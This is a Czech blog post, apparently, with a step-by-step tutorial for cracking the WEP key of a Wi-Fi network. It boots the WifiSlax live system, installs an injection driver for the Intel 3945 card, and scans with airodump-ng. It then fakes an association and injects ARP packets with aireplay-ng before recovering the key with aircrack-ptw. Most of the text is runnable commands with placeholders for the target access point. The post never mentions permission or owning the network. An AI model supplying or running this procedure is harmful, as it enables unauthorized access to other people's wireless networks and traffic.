Prolomení Wifi šifrování WEP s ipw3945

Dnes bych chtěl napsat stručný návod na prolomení šifrování WEP u wifi sítě pomocí integrované wifi karty Intel PRO/Wireless 3945 ABG..

1. Stažení Live CD linuxové distribuce WifiSlax 3.1 small

http://download.wifislax.com:8080/wifislax-small-3.1.iso

2. Instalace Wifislax na USB flash disk

a) rozbalení ISO archivu (např. software Magic Iso, DaemonTool, apod.)
b) zkopírování složek bootwifislax na USB disk
c) spustit a nainstalovat soubor /boot/bootinst.bat na USB disku

3. Nabootování WifiSlax

a) nabootovat z USB flash disku
b) zvolit volbu 1 (Wifislaxs grafickým rozhraní KDE)
c) user: root, heslo: toor

4. Instalace ovladačů wifi adaptéru

a) spustit rozbalovací menu (ikone úplně vlevo dole)
b) Wifislax-Asistencia chipset-Asistencia Intel pro wireless
c) spustit druhou volbu (ovladač injection pro ipw3945)
d) počkat na ukončení instalace v terminálu a terminál uzavřít

5. Skenování sítí a zjištění potřebných údajů

a) otevřít nový terminál
b) příkaz: airodump-ng wifi0
=> zjištění BSSID, ESSID, Channel
c) příkaz ifconfig
=> zjištění vlastní MAC pro rozhraní wifi0

6. Sběr paketů IVs

a) otevřít nový terminál
b) příkazy:
echo „Ch“ > /sys/class/net/wifi0/device/channel
echo „BSSID_AP“ > /sys/class/net/wifi0/device/bssid
airodump-ng -c „Ch“ -w soubor rtap0

7. Asociace wifi karty s Access Pointem

a) otevřít nový terminál
b) příkazy:
echo 2 > /sys/class/net/wifi0/device/rate
ifconfig wifi0 up
aireplay-ng -1 0 -a „BSSID_AP“ -h „MAC_moje“ -e „ESSID_AP“ wifi0

8. Injekce ARP paketů

a) otevřít nový terminál
b) příkaz: aireplay-ng -3 -b BSSID_AP -h MAC_moje -e ESSID_AP wifi0

9. Crackování WEP klíče

a) otevřít nový terminál
b) příkaz: aircrack-ptw soubor-01.cap
c) převod HEX klíče na ASCII klíč – viz. google, online generátor
d) alternativně lze použít Aircrack-ng pod Windows (zkopírovat si *.CAP soubor)

————————————————————————————————————-

Pod Windows injekce paketů s wifi kartou ipw3945 nefunguje. Pasivní odchyt potřebného počtu paketů pak může trvat dny, týdny až být prakticky nemožný. Lze však použít:

a) pasivní monitoring paketů: program CommView (postačuje trial verze)
b) crack WEP: aircrack-ng (k dispozi i grafické GUI rozhraní)

Video návod je k dispozici na YouTube.

WEP cracked
WEP cracked
RubrikyIT

Jedna odpověď na “Prolomení Wifi šifrování WEP s ipw3945”

Napsat komentář

Vaše e-mailová adresa nebude zveřejněna.